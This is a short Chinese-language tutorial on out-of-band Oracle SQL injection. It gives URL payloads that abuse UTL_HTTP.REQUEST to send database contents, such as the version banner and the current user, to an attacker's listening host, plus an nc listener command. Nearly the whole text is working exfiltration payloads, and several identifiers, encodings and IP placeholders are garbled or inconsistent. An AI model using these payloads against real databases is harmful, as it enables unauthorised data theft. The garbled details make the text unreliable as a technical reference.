通过tuthttreguest我们可以将查询的结果发送到远程服务器上,在遇到盲注时非常有用,要使用该方法用户需要有uthttpe访问网络的权限。检测是否支持uthttp.requestlutlttp.request页面正常支持?id=1 and exists (select count(*) from all_objects where object_name=’UTL_HTTP’)— -反弹注入命令?id=1 and utl_http.request(‘http://反弹ip(攻击方ip):2008/'|| (select banner from sys.v$version where rownum=1))=1 — -详解and utlhttp.request(‘http://反弹ip(攻击方ip):端口/'||(注入的语句))=1监听本地信息nc -vvlp 端口查询版本信息and utl_http.request(‘http://目标ip:2008/'%7C%7C%7C(select banner from sys.v$version where rownum=1))=1 — -查询当前系统用户?id=1 and %20 utl_http.request(‘http://目标ip:2008/'%7C%7C%7C(select user from dual))=1 — -